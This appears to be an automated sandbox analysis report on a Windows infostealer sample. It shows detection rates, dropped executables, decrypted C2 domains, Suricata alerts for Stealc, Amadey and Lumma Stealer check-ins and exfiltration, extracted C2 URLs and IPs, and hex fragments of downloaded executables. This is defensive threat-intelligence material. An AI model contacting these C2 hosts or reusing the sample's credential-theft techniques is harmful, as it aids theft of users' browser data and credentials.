                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeReversingLabs: Detection: 54%
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeReversingLabs: Detection: 21%
                          Source: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exeReversingLabs: Detection: 44%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeReversingLabs: Detection: 36%
                          Source: file.exeVirustotal: Detection: 40%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: impend-differ.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: print-vexer.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: dare-curbys.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: covery-mover.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: formy-spill.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: dwell-exclaim.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: zinc-sneark.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: se-blurry.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: atten-supporse.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: - Screen Resoluton:
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: - Physical Installed Memory:
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmpString decryptor: Workgroup: -
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C986C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C986C80
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CADA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,0_2_6CADA9A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAD44C0 PK11_PubEncrypt,0_2_6CAD44C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAA4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,0_2_6CAA4420
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAD4440 PK11_PrivDecrypt,0_2_6CAD4440
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB225B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,0_2_6CB225B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CABE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,0_2_6CABE6E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAB8670 PK11_ExportEncryptedPrivKeyInfo,0_2_6CAB8670
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CADA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,0_2_6CADA650
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAFA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,0_2_6CAFA730
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB00180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,0_2_6CB00180
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAD43B0 PK11_PubEncryptPKCS1,PR_SetError,0_2_6CAD43B0
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: unknownHTTPS traffic detected: 172.67.181.44:443 -> 192.168.2.6:49945 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50002 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50009 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50018 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50024 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50030 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50039 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50054 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50069 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50078 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50079 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50082 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50083 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50084 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50085 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50088 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50089 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50090 version: TLS 1.2
                          Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: firefox.exeMemory has grown: Private usage: 1MB later: 184MB

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49714 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49714 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49714
                          Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49714 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49714
                          Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49714 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49909 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49918
                          Source: Network trafficSuricata IDS: 2057928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (dare-curbys .biz in TLS SNI) : 192.168.2.6:49945 -> 172.67.181.44:443
                          Source: Network trafficSuricata IDS: 2057976 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (dare-curbys .biz in TLS SNI) : 192.168.2.6:49945 -> 172.67.181.44:443
                          Source: Network trafficSuricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.6:63523 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.6:63523 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49944 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (dare-curbys .biz in TLS SNI) : 192.168.2.6:49952 -> 172.67.181.44:443
                          Source: Network trafficSuricata IDS: 2057976 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (dare-curbys .biz in TLS SNI) : 192.168.2.6:49952 -> 172.67.181.44:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49967 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49985 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50002 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50003 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50009 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50010 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50018 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50024 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50038 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50031 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50039 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.6:58337 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50030 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50054 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50061 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50060 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50069 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50082 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50084 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50089 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50090 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50086 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50085 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50083 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50088 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50009 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49945 -> 172.67.181.44:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50009 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49945 -> 172.67.181.44:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50018 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50082 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50030 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50030 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50082 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50083 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50083 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50002 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50002 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50069 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50089 -> 172.67.165.166:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                          Source: Malware configuration extractorURLs: covery-mover.biz
                          Source: Malware configuration extractorURLs: formy-spill.biz
                          Source: Malware configuration extractorURLs: dwell-exclaim.biz
                          Source: Malware configuration extractorURLs: dare-curbys.biz
                          Source: Malware configuration extractorURLs: zinc-sneark.biz
                          Source: Malware configuration extractorURLs: atten-supporse.biz
                          Source: Malware configuration extractorURLs: print-vexer.biz
                          Source: Malware configuration extractorURLs: impend-differ.biz
                          Source: Malware configuration extractorURLs: se-blurry.biz
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Source: Malware configuration extractorIPs: 92.63.197.221
                          Source: Malware configuration extractorIPs: 92.63.197.221
                          Source: Malware configuration extractorIPs: 92.63.197.221
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 06:33:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 06:33:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 